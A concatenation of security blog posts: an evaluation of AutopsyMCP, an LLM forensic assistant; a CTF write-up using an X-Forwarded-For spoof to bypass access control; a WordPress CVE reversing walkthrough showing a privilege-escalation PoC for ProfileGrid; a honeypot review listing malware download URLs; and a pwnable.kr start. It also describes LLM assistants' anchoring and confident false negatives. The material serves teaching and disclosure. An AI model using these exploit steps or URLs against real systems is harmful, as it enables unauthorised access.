It replicated an existing human cognitive bias.\nTask 16 (GPS photo identification) showed the same pattern. Prior session context primed both MCP modes to return to the first geolocated image rather than searching for additional candidates. The context retention framing explains why it happened; the anchoring framing explains why the model didn\u0026rsquo;t correct itself once it had the first candidate in hand.\nHuang et al. (2026) show this mirrors human first-candidate lock-in. If you\u0026rsquo;re deploying AI assistance expecting it to be immune to biases present in its training data, that expectation is worth revising.\n4. Session fragility and context window limits Both MCP modes depend on an uninterrupted session to accumulate context, and that dependency has a real reliability cost. Session termination occurred twice during the full case, discarding all accumulated context. As a result, Task 14\u0026rsquo;s email evidence chain had to be re-established, adding significant time to a task that should have been trivial given what had already been retrieved earlier in the session. Any operational deployment needs to account for this explicitly, because context is not persisted anywhere and recovering it requires manual intervention.\nSeveral mitigations are worth exploring: periodic context summarization, saving intermediate findings to a persistent store, or even a dedicated playbook that formats and snapshots the current investigative context for resumption in a new session. Most of these would benefit from tracking context window usage, so they can trigger proactively rather than after the session is lost.\nThe Forensic Soundness Question Throughout this project, there was a recurring tension between forensic soundness and useful investigative assistance.\nForensic evidence has strict requirements.
ISO/IEC 27037:2012 defines three core principles:\nAuditability: actions must be independently verifiable Justifiability: actions must be explainable Repeatability: same procedures yield the same conclusions The ACPO Good Practice Guide requires that a record of all actions applied to digital evidence be created and preserved so that an independent third party can examine those processes and reach the same conclusions.\nAutopsyMCP addresses these through:\nRead-only access: no tool can modify the forensic image (ACPO Principle 1) Structured audit logging: every tool invocation recorded with timestamp, arguments, response summary, session ID, written independently of the MCP client (ACPO Principle 2) Repeatability: the audit log records what happened in a session, but cannot guarantee a second run follows the same path (ACPO Principle 3, partially addressed) Because the model\u0026rsquo;s tool selection is non-deterministic, the same query may produce different tool sequences, and different conclusions, across independent runs. Individual tool outputs are reproducible; the reasoning path that selected and sequenced them is not.\nNicholson (2026) demonstrates empirically that even at temperature zero, LLMs can produce distinct outputs across repeated invocations of the same prompt.\nThe deeper issue is that these frameworks were designed around deterministic, human-executed procedures. An LLM reasoning layer doesn\u0026rsquo;t fit that model.\nAudit logging is necessary but not sufficient. Sufficiency would require either deterministic tool selection, which would forfeit the analytical flexibility that makes the system useful, or a formal framework for quantifying reasoning variability — neither of which currently exists. 
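The post lists tamper evidence as future work for the audit log. As an illustration only, here is a minimal Python sketch that writes one record per tool invocation with the fields named above (timestamp, tool, arguments, response summary, session ID). It also adds a SHA-256 hash chain as one possible route to tamper evidence. The field names, the chaining scheme and the example arguments are assumptions. This is not the AutopsyMCP logging code.

```python
import hashlib
import json
from datetime import datetime, timezone

GENESIS = '0' * 64  # placeholder previous hash for the first entry (assumption)


def _digest(body):
    # Canonical JSON (sorted keys) so identical records always hash identically.
    canonical = json.dumps(body, sort_keys=True)
    return hashlib.sha256(canonical.encode('utf-8')).hexdigest()


def make_record(session_id, tool, arguments, response_summary, prev_hash):
    # One entry per tool invocation; field names are illustrative only.
    body = {
        'timestamp': datetime.now(timezone.utc).isoformat(),
        'session_id': session_id,
        'tool': tool,
        'arguments': arguments,
        'response_summary': response_summary,
        'prev_hash': prev_hash,  # hypothetical: links this entry to the previous one
    }
    return dict(body, hash=_digest(body))


def verify_chain(records):
    # Recompute every hash and check each link; editing an earlier entry breaks it.
    prev = GENESIS
    for rec in records:
        body = {k: v for k, v in rec.items() if k != 'hash'}
        if body['prev_hash'] != prev or _digest(body) != rec['hash']:
            return False
        prev = rec['hash']
    return True


# Usage with two hypothetical calls (tool names from the post, arguments invented).
log = []
prev = GENESIS
for tool, args, summary in [
    ('search_files_by_name', {'name': 'setup'}, '2 matches'),
    ('get_registry_key', {'hive': 'SYSTEM'}, 'hive not loaded'),
]:
    rec = make_record('session-1', tool, args, summary, prev)
    log.append(rec)
    prev = rec['hash']

print(verify_chain(log))                  # True
log[0]['response_summary'] = '0 matches'  # simulate after-the-fact editing
print(verify_chain(log))                  # False
```

A hash chain only makes tampering detectable. The latest hash still has to be stored or signed somewhere the log writer cannot rewrite.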
The open question for the field is what forensic soundness should mean when the analytical process is non-deterministic.\nPractical Takeaways If you\u0026rsquo;re a forensic practitioner or incident responder:\nThe 63% effort reduction held consistently across both evaluation sets. The knowledge-equalizer effect showed up clearly in this evaluation: registry timestamp parsing, Chrome transition bitmask decoding and SQLite schema interpretation were all handled transparently from a natural language query. For triage, initial case orientation, and structured data retrieval, MCP-assisted investigation performs comparably to manual investigation while requiring dramatically less effort and fewer context switches.\nThe accuracy cost is there too (16/20 for Mode 2 vs 19/20 for manual investigation on the full case). The failure modes cluster predictably: confident false negatives at the conclusion step, anchoring on first-found evidence, over-delegation on tasks where a simpler approach exists. Knowing where the failures concentrate lets you design your workflow around them. Use AI assistance for retrieval and correlation; apply explicit human judgment at the conclusion step; treat confidently stated negative findings with particular skepticism.\nIf you\u0026rsquo;re thinking about AI tooling for security workflows more broadly:\nThe MCP architectural pattern is a meaningful design choice. Constraining an LLM to operate only through logged, verifiable tool calls changes how reliable and auditable the system is. It can no longer reason freely from training knowledge; it has to retrieve and correlate evidence. The failures that remain after applying this constraint are failures of reasoning, not failures of access. That\u0026rsquo;s a narrower problem to address.\nOn forensic soundness specifically:\nAI in DFIR is happening regardless of whether frameworks have caught up. The more productive question is where existing standards hold and where they need extending.
Current standards assume deterministic human procedures; we can see where LLM-assisted workflows diverge, and closing that gap is feasible.\nFuture Work Fallback mechanisms for delegation: cost thresholds or explicit failure triggers to prevent goal persistence on wrong paths Session continuity: context is lost on termination and cannot be recovered; mitigations like a snapshot playbook or periodic summarization are worth exploring Aggregate API endpoints: Autopsy\u0026rsquo;s GUI surfaces a range of views that the current API doesn\u0026rsquo;t yet expose Cryptographic audit log integrity: the current log is functional but not tamper-evident, which is a standard expectation for forensic audit trails Multi-evaluator studies: testing the knowledge-equalizer effect with investigators at varying skill levels. The hypothesis that less experienced practitioners benefit most needs to be tested with multiple practitioners rather than a single evaluator The concurrent independent release of the official Autopsy 4.23.0 MCP integration by the Autopsy development team in April 2026 validates the research direction. The open questions are now about the conditions under which AI-assisted workflows are reliably usable in practice. I hope this work contributes to answering them.\nAppendix: Full Evaluation Results Micro-benchmark: Task Definitions \u0026amp; Full Results # Source Image Category Task Question Expected Answer Mode 1 Time Mode 1 Answer Mode 1 Result Mode 1 Steps Mode 2 Time Mode 2 Answer Mode 2 Result Mode 2 Queries Mode 3 Time Mode 3 Answer Mode 3 Result Mode 3 Queries 1 GregSchardt Registry What was the last recorded computer shutdown date/time? August 27, 2004, at 15:46:33 UTC 6:55 2004-08-27 15:46:33.1092164 Z Correct 4 2:21 2004-08-27 at 16:46:27 BST (Event ID 6006 – EventLog service stopped, Record #141) Correct 1 1:04 Friday, 27 August 2004 at 15:46:33 UTC Correct 1 2 GregSchardt Registry What are the IP address and MAC addresses of the computer?
192.168.1.111, 00:10:a4:93:3e:09 2:25 192.168.1.111, 10a4933e09 Correct 3 0:38 Hostname: N-1A9ODN6ZXK4LQ | MAC: 00:10:A4:93:3E:09 | LAN IP: 192.168.1.111 | APIPA: 169.254.242.213 Correct 1 1:53 192.168.1.111 (subnet 255.255.255.0, gateway 192.168.1.1) Partial 1 3 GregSchardt Registry List the network cards used by this computer (1) Compaq WL110 Wireless LAN PC Card (2) Xircom CardBus Ethernet 100 + Modem 56 0:55 Xircom CardBus Ethernet 100 + Modem 56, Compaq WL110 Wireless LAN PC Card Correct 2 8:56 Xircom CardBus Ethernet, Agere Orinoco PC Card Partial 1 1:11 Xircom CardBus Ethernet 100 + Modem 56 — Ethernet Interface, Xircom CardBus Ethernet 100 + Modem 56 — Modem Interface Partial 1 4 GregSchardt Browser What websites was the suspect (Mr. Evil) accessing? mobile.msn.com (MSN Hotmail email service) 0:45 mobile.msn.com (and others) Correct 4 0:34 mobile.msn.com (and others) Correct 1 0:33 mobile.msn.com (and others) Correct 1 5 Stanley File Discovery Are there any files \u0026gt;50MB in the image? If so, what are their names? GCR 2015 version.doc, GCR.doc 0:59 GCR 2015 version.doc, GCR.doc Correct 3 1:55 $Bad/$Bad-slack: ~378 MB each (NTFS metadata) | IMG_20171119_194709.jpg: 3.4 MB | sendmail.exe: 911 KB Not Found 1 0:56 $BadClus:$Bad 378.3 MB, $BadClus:$Bad-slack 378.3 MB, curly_1709_librivox.zip 149.5 MB, JRE.cab 96.4 MB, GCR 2015 version.doc 92.4 MB, GCR.doc 92.4 MB Correct 1 6 Stanley System What is the sector length of vol3 in the Stanley.E01 image? 614400 0:08 614400 Correct 3 0:10 3,504 sectors and 1,794,048 bytes Incorrect 1 0:17 614400 Correct 1 7 Norman Metadata Can you determine the make and model of camera used for the rose picture? NIKON CORPORATION, NIKON D40 0:11 NIKON CORPORATION, NIKON D40 Correct 3 0:16 NIKON CORPORATION, NIKON D40 Correct 1 0:21 NIKON CORPORATION, NIKON D40 Correct 1 8 Norman User Activity In which two years has the bulk of activity taken place in the DFI? 
2014 and 2017 0:37 2014 and 2017 Correct 3 1:25 2014 and 2017 Correct 1 1:12 2015 and 2017 Partial 1 9 IPTheft File Discovery Are there files containing confidential corporate data? Any evidence of obfuscation? Yes 2:07 Yes Correct 5 2:57 Yes Correct 1 0:03 Yes Correct 1 10 Animal Communication Is there evidence of James Jones communicating with third parties? Yes 0:33 Yes Correct 3 0:34 Yes Correct 1 0:41 Yes Correct 1 Full Case Investigation: Task Definitions \u0026amp; Full Results (Beethomahler) # Category Task Question Expected Answer Mode 1 Time Mode 1 Answer Mode 1 Result Mode 1 Steps Mode 2 Time Mode 2 Answer Mode 2 Result Mode 2 Queries Mode 3 Time Mode 3 Answer Mode 3 Result Mode 3 Queries 1 Verification What are the last 4 digits of the verified SHA1 hash? 8326 0:11 8326 Correct 3 2:11 N/A Not Found 1 1:28 N/A Not Found 1 2 Device Were any external devices attached? If so, provide the device ID. 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 0:14 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 Correct 3 0:16 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 Correct 1 0:16 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 Correct 1 3 Browser Did the suspect bookmark any non-contraband related web pages? No 0:12 No Correct 2 0:10 No Correct 1 0:10 No Correct 1 4 Registry On what date was the OS installed? (YYYY-MM-DD) 2023-02-11 0:10 2023-02-11 Correct 2 0:11 2023-02-11 Correct 1 0:14 2023-02-11 Correct 1 5 Registry OS install date in original UNIX time format? 1676092305 0:41 1676092305 Correct 3 0:05 1676092305 Correct 1 0:18 1676092305 Correct 1 6 Registry What are the last 5 digits of the OS Product ID? 85033 0:02 85033 Correct 1 0:05 85033 Correct 1 0:05 85033 Correct 1 7 System What are the first 8 digits of the device ID? 6ce70ff9 0:16 6ce70ff9 Correct 1 0:09 6ce70ff9 Correct 1 0:05 6ce70ff9 Correct 1 8 System What is the timezone of the seized computer? 
Europe/London 0:02 Europe/London Correct 1 0:06 Europe/London Correct 1 0:06 Europe/London Correct 1 9 Anti-forensics When did the suspect research keeping files private/hidden? (YYYY-MM-DD HH:MM:SS GMT) 2023-02-17 15:20:58 GMT 0:23 2023-02-17 15:20:58 GMT Correct 1 1:19 2023-02-17 15:20:58 GMT Correct 1 1:20 2023-02-17 15:20:58 GMT Correct 1 10 File Transfer Which file transfer service was used to deliver files to the suspect? WeTransfer 0:16 WeTransfer Correct 3 0:14 WeTransfer Correct 1 0:18 WeTransfer Correct 1 11 File Transfer What are the first 8 characters of the received container\u0026rsquo;s filename? 71cc3213 0:37 71cc3213 Correct 5 0:07 71cc3213 Correct 1 0:07 71cc3213 Correct 1 12 File Transfer When was the container saved to disk? (YYYY-MM-DD HH:MM:SS GMT) 2023-02-23 10:45:36 GMT 0:46 2023-02-23 10:45:36 GMT Correct 3 0:10 2023-02-23 10:45:36 GMT Correct 1 0:16 2023-02-23 10:45:36 GMT Correct 1 13 Communication Who sent the file to the suspect? DinnyDjanko 0:01 DinnyDjanko Correct 1 0:08 DinnyDjanko Correct 1 0:13 DinnyDjanko Correct 1 14 Communication What was the suspect\u0026rsquo;s WeTransfer MFA code? 622191 0:23 622191 Correct 2 0:53 622191 Correct 1 3:03 622191, 335306, 335014 Correct 1 15 File Analysis What is the full name of the largest file in the WeTransfer container? McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg 0:41 McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg Correct 4 0:53 McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg Correct 1 1:18 McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg Correct 1 16 Metadata A photo contains GPS coordinates — identify the street address. Burton Road 1:27 Moon Flower Ct or Burton Road Correct 4 2:32 Brown Trail Incorrect 1 1:47 39.9025722, -97.2622833 Incorrect 1 17 User Activity What did the suspect share to their VM? Folder names? 
Downloads, Malware 0:45 Malware, Downloads Correct 2 2:34 Malware, Downloads Correct 1 2:12 Malware, Downloads Correct 1 18 Malware Who was malware sent to, what was it, and when? (who_what_when) dinnydjanko@gmail.com, Solimba, 2023-03-06 06:57:26 2:51 dinnydjanko@gmail.com_piccies.exe_2023-02-28_13:03:48 Incorrect 4 3:40 dinnydjanko@gmail.com_piccies.exe_2023-02-28_13:03:48 Incorrect 1 1:39 dinnydjanko@gmail.com_Multi:Agent-ES_2023-02-28_13:03:48 Incorrect 1 19 Application WMP installation error code and time? (errorcode_HH:MM:SS) 0x80070005, 21:12:15 2:41 0x80070005, 21:12:15 Correct 3 0:18 0x80070005, 21:12:15 Correct 1 4:45 c000001d_12:20:55 Incorrect 1 20 Browser How many times was wetransfer.com opened (excl. refreshes)? Latest timestamp? 3, 2023-03-06 06:03:11 8:38 3, 2023-03-06 06:03:11 Correct 6 3:09 N/A Not Found 1 1:46 4, 2023-03-06 06:03:11 Partial 1 The full dissertation may be available on request once my results are finalized. Code is available on GitHub. Feel free to reach out if you have related work, questions, or feedback.\n","permalink":"https://nhantouli.com/posts/autopsymcp/","summary":"Building and evaluating AutopsyMCP: a natural language interface for Autopsy built on the Model Context Protocol. What worked, what failed, and what it means for AI in forensic workflows.","title":"AutopsyMCP"},{"content":"This year\u0026rsquo;s IntakeCTF for the Warwick Cyber Security Society included a challenge that I created. I\u0026rsquo;ll be going over the challenge and its solution, and I hope participants found it fun \u0026amp; intuitive.\nWeb: Rate the Vibes Description: The society has set up a website to gather feedback to improve future events and competitions. Due to a misconfiguration, you may find a way to access more information than intended. 
- 500 points\nSolution: You start with a simple web app that collects feedback through a form and redirects you to a thank you page.\nThe first step to solving the challenge was to take a look at the homepage\u0026rsquo;s source code. By viewing the source, you’d discover a comment for an outdated endpoint that was once used to store feedback data.\nAccessing this endpoint returns a JSON response like so:\n{ \u0026#34;message\u0026#34;: \u0026#34;Archive has been disabled. No data here.\u0026#34;, \u0026#34;status\u0026#34;: \u0026#34;error\u0026#34; } This clue points to the existence of the /submissions endpoint, which you could also find using a directory brute-forcing tool like Gobuster.\nOnce the /submissions endpoint is identified, the goal is to bypass the 403 Forbidden message to gain access to all user feedback.\nA common bypass technique is to try different HTTP methods such as GET, POST, PUT, etc. If a POST request is sent to /submissions, you get a hint to think about the request\u0026rsquo;s origin.\n% curl -X POST {ip}:{port}/submissions { \u0026#34;message\u0026#34;: \u0026#34;POST request received, but nothing special here. Are you sure you\u0026#39;re coming from the right place?\u0026#34; } The correct method to bypass the 403 error is setting the X-Forwarded-For header to 127.0.0.1. 
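The challenge source is not shown here, so the following is only a minimal Python model of the kind of check the challenge simulates. The function names, the TRUSTED set and the proxy address are hypothetical. The vulnerable version takes the client address from a header the client controls. The safer variant only honors X-Forwarded-For when the TCP peer is a known reverse proxy.

```python
TRUSTED = {'127.0.0.1'}         # addresses allowed to read /submissions
TRUSTED_PROXIES = {'10.0.0.5'}  # hypothetical reverse proxy in front of the app


def client_ip_vulnerable(remote_addr, headers):
    # Misconfiguration: believe X-Forwarded-For from any client.
    # (headers is a plain dict here; real header lookups are case-insensitive.)
    xff = headers.get('X-Forwarded-For')
    if xff:
        return xff.split(',')[0].strip()
    return remote_addr


def client_ip_safer(remote_addr, headers):
    # Only trust the header when the direct peer is our own proxy; with a single
    # proxy, the last entry is the address that proxy actually saw.
    xff = headers.get('X-Forwarded-For')
    if xff and remote_addr in TRUSTED_PROXIES:
        return xff.split(',')[-1].strip()
    return remote_addr


def can_view_submissions(remote_addr, headers, resolve):
    return resolve(remote_addr, headers) in TRUSTED


attacker = '203.0.113.7'
spoofed = {'X-Forwarded-For': '127.0.0.1'}
print(can_view_submissions(attacker, {}, client_ip_vulnerable))       # False (403)
print(can_view_submissions(attacker, spoofed, client_ip_vulnerable))  # True (bypass)
print(can_view_submissions(attacker, spoofed, client_ip_safer))       # False
```

In the vulnerable model, any client that adds the header claiming 127.0.0.1 is treated as local.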
This simulates a misconfigured environment where requests that appear to come from localhost are trusted, so a spoofed header bypasses the IP-based access control.\nThe following command can be used to retrieve the flag: curl -H \u0026quot;X-Forwarded-For: 127.0.0.1\u0026quot; http://{ip}:{port}/submissions. Alternatively, set the header manually using a tool like Burp Suite and send the request.\nFlag: Intake24{******************}\n","permalink":"https://nhantouli.com/posts/intakectf-2024/","summary":"Writeup for the challenge I created for this year\u0026rsquo;s IntakeCTF at Warwick.","title":"CyberSoc IntakeCTF 2024"},{"content":" Update (2024-11-13): Expanded on this topic during a co-presented talk for the Cyber Security Society. See more here.\nCVE reversing is the process of creating a proof-of-concept (PoC) based on the differences between the code of a vulnerable software version and its patched version. By looking at the diffs, it\u0026rsquo;s possible to identify the vulnerability in the original code.\nI recently obtained two CVEs for stored XSS and SQLi in a plugin with over 400 active installations (CVE-2024-43967, CVE-2024-43966). These vulnerabilities required at least Editor or Admin level privileges. By practicing CVE reversing more often, I aim to better detect more complex and high-impact vulnerabilities moving forward.\nI will be examining CVE-2024-6411. The plugin ProfileGrid was vulnerable to privilege escalation and was classified as a CVSS 8.8 issue.\nPlugin Description ProfileGrid is a WordPress user profile and membership plugin. It integrates with WooCommerce and bbPress, supports content restriction, sign-up pages, blog submissions, notifications, social activity, private messaging, etc.\nIssue Description The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.8.9. This is due to a lack of validation on user-supplied data in the \u0026lsquo;pm_upload_image\u0026rsquo; AJAX action.
This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their user capabilities to Administrator.\nWordfence has also published a technical analysis regarding this issue.\nTechnical Details Looking at the CVE entry, we can see that the vulnerable version is \u0026lt;= 5.8.9 and it was patched in version 5.9.0. We can navigate to https://plugins.trac.wordpress.org/log/profilegrid-user-profiles-groups-and-communities/trunk and select the changes in 5.8.9 and 5.9.0.\nTrac is used to browse all the code changes in a plugin or theme. It can be a useful tool to review changes and see if any vulnerabilities were patched or introduced in the latest version.\nClicking on “View Changes” returns a page that contains all the changes in the code.\nReviewing the changes, we come across a call to the update_user_meta function in /public/partials/crop.php.\nThis call is made whenever a user attempts to update their profile picture. update_user_meta takes the user ID, the metadata key, and the new value to set or modify that metadata field. Meta keys are a WordPress-specific feature used to store custom fields and data for different WordPress objects like posts, users, and comments.\nIn the ProfileGrid plugin, the pm_user_avatar meta key is specifically used to store a user’s avatar information. If the plugin does not enforce proper validation on this $_POST request, an attacker may be able to set the user_meta field to an arbitrary meta key (e.g. wp_capabilities).\nThe pm_upload_image() function in the Profile_Magic_Public class handles the upload, editing, or deletion of the user’s profile picture.\npublic function pm_upload_image() { require \u0026#39;partials/crop.php\u0026#39;; die; } This function includes the crop.php file, which handles the actual request processing.
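To make the flaw concrete, the following is a simplified Python model of the logic described in this post. It is not the PHP code of the plugin, and the in-memory store and function names are hypothetical. The vulnerable handler passes the user_id, user_meta and attachment_id from the request straight to update_user_meta. The patched one adds the two checks that version 5.9.0 introduces: the requested user_id must match the logged-in user, and the only writable key is pm_user_avatar.

```python
# Hypothetical in-memory stand-in for WordPress user meta: {user_id: {meta_key: value}}
user_meta = {2: {'pm_user_avatar': 367, 'wp_capabilities': {'subscriber': True}}}


def update_user_meta(user_id, key, value):
    # Like the WordPress function, this writes whatever key it is given.
    user_meta.setdefault(user_id, {})[key] = value


def upload_image_vulnerable(current_user_id, post):
    # Pre-5.9.0 behavior as described: no checks on the request fields.
    update_user_meta(post['user_id'], post['user_meta'], post['attachment_id'])


def upload_image_patched(current_user_id, post):
    # 5.9.0 behavior as described: own profile only, avatar key only.
    if post['user_id'] != current_user_id or post['user_meta'] != 'pm_user_avatar':
        raise PermissionError('invalid request')
    update_user_meta(post['user_id'], post['user_meta'], post['attachment_id'])


# A Subscriber (ID 2) tampers with the crop request, as in the PoC.
evil = {'user_id': 2, 'user_meta': 'wp_capabilities',
        'attachment_id': {'administrator': '1'}}

try:
    upload_image_patched(2, evil)
except PermissionError:
    print('patched: rejected')
print(user_meta[2]['wp_capabilities'])  # {'subscriber': True}

upload_image_vulnerable(2, evil)
print(user_meta[2]['wp_capabilities'])  # {'administrator': '1'}
```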
pm_upload_image() is also hooked to an AJAX action that manages profile picture uploads:\n$this-\u0026gt;loader-\u0026gt;add_action(\u0026#39;wp_ajax_pm_upload_image\u0026#39;, $plugin_public, \u0026#39;pm_upload_image\u0026#39;); When this AJAX action is triggered, it loads the crop.php file, where the call to update_user_meta() is performed. The changes between versions 5.8.9 and 5.9.0 show us how the vulnerability was mitigated and how we could potentially exploit it.\nMitigation We can see that in version 5.9.0, the vulnerability was mitigated by introducing additional validation checks. Specifically, the changes ensure that:\nThe user_id in the request matches the ID of the currently logged-in user ($current_user-\u0026gt;ID). The user_meta field is explicitly restricted to pm_user_avatar. Together, these checks ensure that only the profile picture metadata can be updated, and only by the user it belongs to.\nExploitation Before the fix, the lack of validation on the user_meta field meant an attacker could set it to wp_capabilities and provide a value that grants Administrator privileges (wp_capabilities is the meta key that stores user roles and permissions). The exploit requires an attacker to be an authenticated user with Subscriber-level access and above \u0026ndash; as only they would have existing profiles and be able to trigger the AJAX action.\nPoC We log in as a Subscriber user and attempt to update our profile picture.\nUsing Burp Suite we can capture the request made when we click on \u0026ldquo;Crop \u0026amp; Save\u0026rdquo;.\nWe then change user_meta from pm_user_avatar to wp_capabilities and change attachment_id from 367 to [administrator]=1, so that the submitted value is an array granting the administrator role.\nAfter sending the request, the page refreshes and the cover image updates to an image associated with Administrator accounts.
The toolbar at the top of the WordPress dashboard now also includes options and features that are available only to Administrators.\nGoing to the Users page in the WordPress dashboard confirms that the previously Subscriber-level user now has the Administrator role, giving them full control over the WordPress site.\nConclusion We have seen how an insecure implementation of the pm_upload_image() function in the ProfileGrid plugin led to a high-severity privilege escalation vulnerability. The plugin developers addressed this issue in version 5.9.0 by implementing stricter control over the metadata that can be updated through this function. This reinforces the importance of input validation in development \u0026ndash; never trust, always verify.\nTransitioning from standard web application testing to code review, especially for WordPress plugins, can be pretty challenging if you\u0026rsquo;re not familiar with the intricacies of WordPress. This process offers a way to deepen your understanding and become more proficient at identifying the different ways vulnerabilities can occur within this ecosystem.\n","permalink":"https://nhantouli.com/posts/wp-cve-reversing/","summary":"Reversing CVEs in WordPress Plugins to learn more complex exploitation techniques.","title":"WordPress CVE Reversing"},{"content":"T-Pot is an open-source honeypot solution developed by Telekom Security. It supports 20+ honeypots and uses the Elastic Stack to visualize the data collected. I\u0026rsquo;ve collected about 3 weeks\u0026rsquo; worth of historical data and activity logs, which should be sufficient for a review.\nRegarding the setup, I hosted T-Pot in the cloud on Vultr, with the server location set to London.
The server ran Ubuntu 24.04 LTS with 4 vCPUs, 8 GB of memory, 6 TB of bandwidth, 180 GB of NVMe storage, and the hostname srv-data01.\nIf you don\u0026rsquo;t already know what a honeypot is, it is a decoy system or server designed to attract attackers and study their TTPs (tactics, techniques, and procedures). Honeypots can be classified by the level of interactivity they offer adversaries: low-interaction, medium-interaction, or high-interaction. They can also be deployed internally (inside a LAN) or externally (exposed to the internet); in our case, the honeypot is deployed externally.\nT-Pot is designed to be low maintenance and can be considered a medium-interaction honeypot. Although it was deployed for a relatively short period (~3 weeks), it still collected detailed attack patterns and signatures.\nRemote Access and Tools Once T-Pot is up and running, the landing page can be accessed via https://\u0026lt;your.ip\u0026gt;:64297, which provides access to the honeypot data along with a couple of other tools.\nSince the logs from the honeypots are forwarded to Elasticsearch and displayed in Kibana, our main focus will be on Kibana, as that is where the bulk of the honeypot data is available for analysis.\nAnalyzing the Data Kibana Dashboard The screenshot above shows the main T-Pot dashboard in Kibana. In the ~23 days T-Pot was running, approximately 3,450,000 attacks were collected. There\u0026rsquo;s a lot to unpack here; some of the key findings:\nCowrie and Ddospot were the two most targeted honeypots, accounting for more than three-quarters of the total attacks. The top five countries from which attacks originated were the United States, China, Hong Kong, Russia, and France. Examining the Honeypot Attacks Histogram and the Attacks by Honeypot Histogram, we can see that the spikes in the data are primarily attributable to DDoS attacks. The top ports accessed were 123 (NTP), 22 (SSH), 445 (SMB over IP), and 1433 (MSSQL).
The data also reveals the top attackers\u0026rsquo; ASNs and source IPs. Additionally, it shows the credentials used in access attempts, which we will investigate further when discussing Cowrie. We can look into the reputation of the source IPs involved in these attacks:\nThe T-Pot dashboard also shows Suricata (IDS) results, giving us a look at indicators of compromise (IoCs) through the top detected CVEs and alert signatures.\nEach signature corresponds to a particular type of attack pattern that Suricata is designed to detect.\nCowrie While the previous data gives us a good overall picture, the data collected by the Cowrie honeypot will allow us to better understand specific threats and attacker behavior.\nCowrie is an SSH/Telnet honeypot which logs brute force attacks and shell interaction performed by the attacker.\nBelow, we can see the ports targeted in relation to the countries the attacks originate from.\nSSH is clearly the more commonly targeted service, with significantly more attacks than Telnet (which accounts for just 6.2% of the attacks). While Telnet is old and inherently insecure, it is still used by some legacy systems, which explains why it remains a point of interest for attackers.\nWe can also look at the credentials used in attempts to access the honeypot:\nFrequently attempted usernames include admin, root, and server, with passwords such as admin, password, and root. These are common because many systems ship with default accounts that use these names together with default or weak passwords.\nHowever, we also see 3245gs5662d34 and 345gs5662d34 frequently used as passwords. These passwords initially seemed very random, but I later discovered that similar cases have been observed on many other honeypots.
Since they don\u0026rsquo;t correspond to any known attack vectors, my best guess is that they are part of a honeypot detection strategy.\nMoving on, once the attackers obtain a shell on the system, all their command line inputs are logged:\nGenerally, the commands show attempts to gather system information and modify configurations. This would help attackers maintain access and decide which exploit to launch. Although most of these commands likely come from bots, this information can provide valuable insights about the attackers\u0026rsquo; TTPs \u0026ndash; whether they are human or automated.\nCowrie also records the files attackers try to bring onto the system. The most frequently accessed URIs used by attackers to download files are:\nSubmitting these to VirusTotal:\nWe find that http://37.44.238.67/bins.sh is associated with the GAFGYT (or BASHLITE) malware, and http://87.121.112.42/ssh.sh is associated with the MIRAI botnet. Both pose a serious threat to vulnerable IoT devices.\nCowrie also lists the top downloaded files, regardless of where they were downloaded from:\nThe clean.sh script erases traces of malware by cleaning crontab entries, stopping mining services, and deleting temporary files. It has previously been observed searching for and removing competing coin miners and other malware.\nThe redtail file was downloaded in builds for various architectures, including .arm7, .arm8, .x86_64, and .i686; further research revealed it to be cryptomining malware.\nTwo other downloads, not visible in the image, were also observed: sshd (OpenSSH Daemon) and eyshcjdmzg (Linux Trojan - XorDDoS).\nWrapping It Up There’s still a lot that can be done with the data from the honeypot. The data shows how heavily threat actors rely on automation and botnets. In the future, I hope to run it for a longer period to collect even more actionable data.
This could help in discovering previously undetected malware samples that I could attempt to reverse engineer. With an extended collection period, we may see even more interesting and valuable data from the other honeypots that T-Pot deploys.\nThank you for reading!\n","permalink":"https://nhantouli.com/posts/t-pot/","summary":"Studying adversary tactics with a honeypot that\u0026rsquo;s been running for less than a month.","title":"Threat Intelligence with T-Pot"},{"content":"This post details my writeups for a few of the challenges at pwnable.kr \u0026ndash; a wargame site for pwn challenges. As I make my way through the other challenges I\u0026rsquo;ll periodically update this page with additional writeups. I may also work through the Nightmare course to get better at binary exploitation/reverse engineering as I\u0026rsquo;ve heard positive feedback about it.\nfd: Mommy! what is a file descriptor in Linux? ssh fd@pwnable.kr -p2222 (pw:guest) Solution: There are 3 files provided: the binary fd, the source code fd.c and a flag file flag.\nAttempting to cat the flag results in a Permission denied error due to a lack of permissions on the file. Therefore, we need to work with the fd binary. The source code, fd.c:\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc\u0026lt;2){ printf(\u0026#34;pass argv[1] a number\\n\u0026#34;); return 0; } int fd = atoi( argv[1] ) - 0x1234; int len = 0; len = read(fd, buf, 32); if(!strcmp(\u0026#34;LETMEWIN\\n\u0026#34;, buf)){ printf(\u0026#34;good job :)\\n\u0026#34;); system(\u0026#34;/bin/cat flag\u0026#34;); exit(0); } printf(\u0026#34;learn about Linux file IO\\n\u0026#34;); return 0; } So, we need to pass a number as argv[1], which will be converted to an integer using the atoi function. The program then subtracts 0x1234 from this integer to get the file descriptor fd.
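The arithmetic can be checked with a short Python sketch that mirrors the fd calculation in fd.c. target_fd is a hypothetical helper. Python int() stands in for atoi; note that int() raises on non-numeric input, whereas atoi silently returns 0.

```python
STD_FDS = {0: 'stdin', 1: 'stdout', 2: 'stderr'}


def target_fd(argv1):
    # Same calculation as fd.c: atoi(argv[1]) - 0x1234
    return int(argv1) - 0x1234


print(0x1234)                      # 4660
print(target_fd('4660'))           # 0
print(STD_FDS[target_fd('4660')])  # stdin
```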
